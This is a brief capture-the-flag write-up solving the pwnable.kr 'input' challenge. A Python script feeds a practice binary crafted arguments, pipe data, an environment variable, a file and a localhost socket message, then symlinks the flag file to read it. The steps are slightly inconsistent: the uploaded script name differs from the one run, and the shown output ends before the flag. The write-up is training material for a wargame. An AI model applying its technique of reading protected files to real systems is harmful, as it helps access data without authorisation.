pwnable.kr input

1. Write the script

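import os, socket, subprocess, time

# argv: 100 entries in total; the entries at index ord('A'), ord('B') and
# ord('C') are replaced, and argv['C'] is the port used in the network step
args = ['filename'] + ["A"] * 99
args[ord('A')] = ""
args[ord('B')] = "\x20\x0a\x0d"
args[ord('C')] = "8444"

# stdio: the child gets the read ends of two pipes as its stdin and stderr;
# the bytes are queued in the pipes before the child starts
stdinr, stdinw = os.pipe()
stderrr, stderrw = os.pipe()
os.write(stdinw, b"\x00\x0a\x00\xff")
os.write(stderrw, b"\x00\x0a\x02\xff")

# env: a single variable with a binary name and value
# (bytes literals keep the script working under both Python 2 and Python 3)
environ = {b"\xde\xad\xbe\xef": b"\xca\xfe\xba\xbe"}

# file io: a file named "\n" in the current directory, holding four NUL bytes
with open("\x0a", "wb") as f:
    f.write(b"\x00" * 4)

# network
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

proc = subprocess.Popen(["/home/input2/input"] + args[1:], stdin=stdinr, stderr=stderrr, env=environ)

# wait before connecting to the port passed as argv['C']
time.sleep(2)
s.connect(('127.0.0.1', 8444))
s.send(b'\xde\xad\xbe\xef')
s.close()
time.sleep(2)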

2. Create a directory on the server

mkdir godspeed
cd godspeed

3. Upload the script to that directory

scp -P 2222 test.py [email protected]:/tmp/godspeed

4. Create a symbolic link

ln -s /home/input2/flag flag

5. Run the script to get the flag

input2@pwnable:/tmp/godspeed$ python youneverknow4.py
Welcome to pwnable.kr
Let's see if you know how to give input to program
Just give me correct inputs then you will get the flag :)
Stage 1 clear!
Stage 2 clear!
Stage 3 clear!
Stage 4 clear!
Stage 5 clear!
Mommy! I learned how to pass various input in Linux :)
